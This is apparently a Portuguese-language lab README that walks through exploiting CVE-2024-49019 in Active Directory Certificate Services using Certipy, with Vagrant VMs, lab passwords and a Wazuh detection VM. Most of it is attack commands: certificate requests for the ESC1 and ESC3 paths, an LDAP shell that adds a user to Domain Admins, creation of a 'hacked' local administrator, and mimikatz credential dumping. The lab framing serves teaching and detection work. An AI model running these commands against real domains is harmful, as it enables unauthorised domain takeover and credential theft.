
Exploração para CVE-2024-49019
A CVE-2024-49019 é uma vulnerabilidade nos Serviços de Certificados do Active Directory (AD CS) que permite a um atacante escalar privilégios ao usar indevidamente a autenticação baseada em certificados. Este guia demonstra como explorar essa vulnerabilidade usando o Certipy.
| Máquina Virtual | Usuário | Senha |
|---|---|---|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser | $Vulnerable139 |
| Kali-VM | vagrant | vagrant |
| Ubuntu-Wazuh | wazuh | admin |
A VM Ubuntu-Wazuh é usada para fins de detecção. Guia de Detecção Mitigação
Primeiro, clone o repositório contendo os arquivos necessários:
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
Você deve instalar o Vagrant na sua máquina host antes de continuar.
Baixe e instale o Vagrant a partir de aqui ou instale usando o PowerShell:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
cd windows-server2022
vagrant up
cd kali-VM
vagrant up
cd WazuhUbuntu
vagrant up
Como o exploit requer uma rede NAT, configure o VirtualBox da seguinte forma:
Antes de executar o comando abaixo, certifique-se de que VBoxManage foi adicionado às suas variáveis de ambiente. Se não estiver, execute o comando usando o caminho completo:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Se VBoxManage não for reconhecido, use:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Certifique-se de verificar todas as VMs no VirtualBox e garanta que elas estejam atribuídas ao adaptador de rede NatNetwork - NatNet1. Você pode criar uma rede NAT com um nome diferente, mas ela deve estar no intervalo de IP 10.0.2.0/24.
Antes de continuar, certifique-se de que todas as VMs estejam ligadas.
Acesse a VM Kali Linux para iniciar o ataque e atualize o arquivo /etc/hosts:
sudo nano /etc/hosts
Adicione a seguinte entrada:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
Salve e saia.
Navegue até o diretório CVE-49019 e ative o ambiente virtual Python:
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
Existem duas maneiras de explorar essa vulnerabilidade: ESC1 e ESC3.
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
add_user badadmin
add_user_to_group badadmin "Domain Admins"
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
Existe uma solução alternativa: certifique-se de que sua máquina host tenha o mesmo horário que o Windows Server. Certifique-se de executar este comando para atualizar a VM Kali-Linux para que fique igual ao Windows Server.
sudo timedatectl set-ntp off
sudo rdate -n 10.0.2.121
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
Uma vez obtido o acesso de nível administrativo, o atacante pode:
net user hacked /add
net localgroup "Administrators" hacked /add
sekurlsa::logonpasswords
Para estratégias de detecção e mitigação, consulte o guia de detecção.
A CVE-2024-49019 apresenta um risco de segurança significativo devido à sua capacidade de permitir escalada de privilégios não autorizada. Compreender essa vulnerabilidade e implantar mecanismos de detecção adequados, como o uso do Wazuh, é crucial para proteger ambientes do Active Directory.
Para obter mais informações sobre como proteger o AD CS, consulte Microsoft Security CVE-2024-49019.